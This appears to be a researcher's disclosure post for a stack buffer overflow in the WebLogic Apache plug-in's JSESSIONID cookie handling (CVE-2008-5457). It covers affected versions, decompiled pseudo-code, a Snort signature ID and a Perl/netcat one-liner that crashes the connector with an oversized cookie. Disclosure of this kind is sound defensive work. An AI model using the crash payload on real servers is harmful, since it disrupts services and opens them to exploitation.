Sometimes you forget you reported a vulnerability. Especially when the vendor keeps sending you lots of messages that contain the following:

____________________________________________________

Reporter: Matt Watchinski ("Matt Watchinski" <mwatchinski@sourcefire.com>)
Organization: Sourcefire
____________________________________________________

Tracking #: 13175503
Description: BEA WEBLOGIC PLUG-IN FOR APACHE JSESSION COOKIE OVERFLOW
Status: Under investigation / Being fixed in main codeline

____________________________________________________
Reporter: Lurene Grenier ("Lurene Grenier" <lgrenier@sourcefire.com>)
Organization: Sourcefire
____________________________________________________

Eventually, you just create an email filter to ship them off somewhere, and review them every few weeks to make sure they don't say anything different. After a while I totally forgot about it, until I deleted the filter and a new one showed up in my inbox, which I responded to by asking when it would be fixed. To my suprise, the response I got back was that the January CPU 2009 update for Oracle fixed this problem.

Since this is now +60 days from some definition of Day 0, here are all the details.

Additionally, this has been detected by Snort/Sourcefire since 10/22/08 by SID 15010 GID 3

BEA WebLogic plug-in for Apache JSESSION Cookie overflow

Discovery Date:
10/20/08

Release Date:
1/13/09 - Oracle patched
3/27/09 - We noticed

Severity:
High

Vendor:
Oracle / BEA Weblogic

Systems Affected:
Apache Plugin http://download.oracle.com/otn/bea/weblogic/server103/WLSWebServerPlugins1.0.1150354-Apache.zip or below. This link is still on most of the BEA weblogic pages. The only way to get the patch is with a Oracle Support Account.

  • Apache Plug-ins up to an including the ones released on October 14, 2008 which implies:
  • Oracle WebLogic Server 10.3
  • Oracle WebLogic Server 10.0 released through MP1
  • Oracle WebLogic Server 9.2 released through MP3
  • Oracle WebLogic Server 9.1
  • Oracle WebLogic Server 9.0
  • Oracle WebLogic Server 8.1 released through SP6
  • Oracle WebLogic Server 7.0 released through SP7
  • Oracle WebLogic Server 6.1 released through SP7

Overview:
A vulnerability exists in the parsing of the JSESSIONID cookie in the Apache Plug-in connector for BEA Weblogic that can result in a buffer overflow. This vulnerability may impact the availability, confidentiality or integrity of WebLogic Server applications which use the Apache web server configured with the WebLogic plug-in for Apache. This vulnerability may be remotely exploitable without authentication, i.e. it may be exploited over a network without the need for a username and password.

Technical Details:
The vulnerability is the result of an incorrectly bounded strncpy that uses the length of the cookie parameter and not the length of the destination buffer as the amount of data to copy. Additionally clustering must be enabled for this specific function to be reached.

MD5sum of Plugin used for testing this vulnerability
db64bd7edabdd4712cb26e1f8675a9

e0 mod_wl_22.so

Psuedo Code Of the vulnerability:

v8 = strchr(v6, 59);        if ( v7 == (const char *)v4 || (v9 = *(v7 - 1), v9 == 32) || v9 == 59 )        {          if ( v8 )          {            v12 = v8 - v7;          }          else          {            v11 = v7;            v10 = -1;            do            {              if ( !v10 )                break;              v50 = *v11++ == (_BYTE)v8;              --v10;            }            while ( !v50 );            v12 = ~v10 - 1;          }          strncpy(&ArgList, v7, v12);          sub_10009730(50, *(char **)(v2 + 1172), "Found cookie from cookie header: %s\n", &ArgList);          break;        }


As you can see v8 and v7 are used to calculate the length of data to be copied and is stored in v12. v8 and v7 are the end and begining points of the cookie value. This makes v12 the length of the cookie value. The problem is that ArgList in the strncpy is a fixed size and is stored directly on the stack. If the result of v8 and v7 is greater than the max size of ArgList then a buffer overflow occurs.

httpd.conf / apache conf used to test this vulnerability:

 MatchExpression *.* WebLogicCluster localhost:7001 WebLogicHost localhost WebLogicPort 7001


Simple reproduction case:

Exploitation requires a JSESSIONID cookie value of greater than 8000 bytes to trigger:perl -e 'print "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie:JSESSIONID=" . "A"x9000 . "\r\n\r\n" | nc  80


This should cause the connector to crash. Apache will then restart it.

Metasploit 3.0 reproduction case:
Added to svn

Vendor Status:
Reported to Oracle on 10/22/08
Patched by Oracle on 01/13/09

Credit:
* Matthew Watchinski - Sr. Director Sourcefire Vulnerability Research Team (VRT)
* Lurene Grenier - Analyst Team Lead, Sourcefire VRT

References:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

CVE - 2008-5457